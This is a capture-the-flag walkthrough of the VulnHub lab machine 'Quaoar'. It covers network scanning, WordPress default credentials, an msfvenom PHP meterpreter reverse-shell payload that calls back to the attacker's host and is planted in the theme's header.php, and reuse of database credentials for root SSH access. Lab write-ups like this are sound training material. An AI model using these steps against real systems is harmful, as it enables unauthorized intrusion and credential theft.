VulnHub - Quaoar


Information

Name Author Series Difficulty
Quaoar Viper hackfest2016 Easy

Let’s Start

We start with checking our IP address with: ifconfig

ifconfig Our IP is:

192.168.1.45

Now open Zenmap (nmap GUI verison), and do a “Quick Scan” for the IP “192.168.1.*” ( * symbolize for every number) Zenmap Scan We found that the Target IP is:

192.168.1.47

and that there are a lot of open ports, include the http port (80), so let’s try to put this IP in the FireFox IP in FireFox When we click on the image we move to this page Anther Page But there is nothing in those pages or in the pages source

Let’s try to check what we have on the web server with Nikto

nikto -h 192.168.1.47

Nikto Scan We got that there is a

  • rotbots.txt - we need to manually open
  • Wordpress - on the server

Let’s use Curl to get information from server (we want to get the robots.txt file)

curl -h 192.168.1.47/robots.txt

Robots.txt Check We got that there is Wordpress on the server, and that hackers are not allowed (sad smiley).

  • robtos.txt

now let’s check the Wordpress Wordpress

  • Wordpress

We have excellent tool for Wordpress called wpscan, so let’s use it.

wpscan --url 192.168.1.47/wordpress --enumerate

Wpscan Default Admin Password |username|Password | |–|–| | admin|admin | |wpuser| wpuser

We can see that we got the WP verison and that the default admin password is still in use!!

Now to move to the login page, just click on the login button the left down corner of the page Move To Login Page

192.168.1.47/wordpress/wp-login.php

now use the username:password

admin:admin

and….We’re in! Whenever you login to Wordpress admin page, it’s recommnded to try to upload php shell script. So let’s create one with msfvenom (it’s tool of Metasploit that generate payloads)

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.45 LPORT=4444 -f raw > Desktop/phpshell.php

Let’s break it down -

  • msfvenom - the software we use
  • -p php/meterpreter/reverse_tcp - the payload we want to use
  • LHOST 192.168.1.45 - our host to send the information to.
  • LPORT 4444 - the port we want to work on
  • -f raw - the file format we want
  • > Desktop/phpshell.php - where we want to save the file and the name of it

Msfvenom Php Shell Now open the file with some editor and copy the php code PHP Code Now we need to go back to the wordpress admin panel and find some place to upload this php code, let’s check if in the Appearance there is some place for this, maybe in the editor. Yes we can find on the right side of the screen the php code for the header lets click on it, and paste our code and at the end upload it to the server.

  1. Appearance
  2. Editor
  3. header.php
  4. paste code
  5. upload

Upload the php code

Now we want to start listening to this port, so we open msfconsole.

msfconsole and update our settings

use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.1.45
set lport 4444
exploit and now we are start listening. Open the web page of wordpress

192.168.1.47/wordpress

Open the web page And back to the console we can see that we have connection New Connection We want to search in files for clues, so let’s see what files we have with the basic command

ls

We can see a config file, open it

cat wp-config.php

we can see we have a username and password to MySQL, maybe its the same for the ssh?

username password
root rootpassword!

to connect for the ssh we use this:

ssh root@192.168.1.47

it’s ask for password, so write rootpassword! (you cant see your typing when you type the password but keep typing and press enter) And we are in!

Again let’s check the files for clues with

ls

we can see a file name flag.txt. Open it

cat flag.txt

The flag is:

8e3f9ec016e3598c5eec11fd3d73f6fb